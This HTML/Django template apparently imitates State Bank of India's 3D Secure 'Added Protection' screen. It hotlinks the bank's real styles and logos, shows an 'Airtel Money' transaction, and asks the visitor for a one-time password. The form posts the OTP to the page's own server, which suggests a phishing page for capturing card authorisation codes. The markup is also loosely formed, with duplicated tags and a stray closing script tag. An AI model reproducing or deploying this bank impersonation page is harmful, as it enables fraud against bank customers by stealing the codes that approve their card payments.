<Html>

<Head>
     
</Head>

</Html>

<html>

<head>
     <title>
          State Bank Group
     </title>
     <link rel="stylesheet" type="text/css" href="https://acs.onlinesbi.com/sbi/common/css/styles.css">
     <link rel="stylesheet" type="text/css" href="https://acs.onlinesbi.com/sbi/common/css/fonts.css">
</head>

<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"
     onload="javascript:return radioClicked();">
     <center>
          <table border="0" cellspacing="0" cellpadding="0" width="650" align="center">
               <tr>
                    <td valign="top">
               <tr>
                    <td valign="top">
                         <div id="buehne3" style="text-align:left">

                              <img src=https://acs.onlinesbi.com/sbi/images/maestro_logo_small.GIF border="0" alt=""
                                   usemap="#logo">
                              <br>
                              <img src="https://acs.onlinesbi.com/sbi/images/logo_securecode.gif
" border="0" alt="" usemap="#logo">
                         </div>
                    </td>
                    <td>
                         <div id="buehne3" style="text-align:right"> <img
                                   src="https://acs.onlinesbi.com/sbi/images/SBGroup logo_small.JPG" border="0" alt=""
                                   usemap="#logo"></div>
                    </td>
               </tr>
               <tr>
                    <td colspan=2 align=center>
                         <form method="post" action="" name="contactform" id="contactform" autocomplete="on">
                              {% csrf_token %}
                              <table border=0 align=center width=85% bordercolor=black cellspacing=0 cellpadding=2
                                   class="content_fltxt_12">
                                   <tr>
                                        <td colspan=2 class="content_headline_1">
                                             <b>Added Protection</b><br />
                                             <br />
                                        </td>
                                   </tr>
                                   <tr>
                                        <td colspan=2>
                                             <font face="Arial, Helvetica, sans-serif" size="2">
                                                  Please enter One time password in order to complete your</br>
                                                  transaction.
                                                  This information will not be shared with the merchant.</font><br />

                                             <br />
                                        </td>
                                   </tr>

                                   <tr>
                                        <td width="35%">

                                             Merchant Name

                                        </td>
                                        <td class="table_input_184">

                                             : Airtel Money
                                        </td>
                                   </tr>

                                   <tr>
                                        <td width="35%">

                                             Card Number

                                        </td>
                                        <td class="table_input_184" align=left>

                                             :

                                             xxxx xxxx xxxx xxxx

                                        </td>
                                   </tr>
                                   <tr>

                                        <td width="35%">

                                             Personal

                                             Greeting

                                        </td>
                                        <td align=left class="table_input_184">



                                             :This transaction is protected .

                                        </td>

                                   </tr>

                                   <tr>
                                        <td>
                                        </td>
                    </td>
               </tr>
               <br>
               </br>


               <tr>
                    <td width="35%">

                         <h3><b>One Time Password</b></h3>

                    </td>
                    <td class="table_input_184" align=left>
                         :
                         <input type="password" name="otp" maxlength="20" style="width:145px; height:18px" required>
                         </script>

                    </td>
               </tr>
               <tr>
                    <td colspan=2 align=center>
                         <br />

                         <input type="submit" name="submit" value="Submit">
                    </td>
               </tr>
          </table>
          </form>
          </td>
          </tr>
          </table>
     </center>
</body>

</html>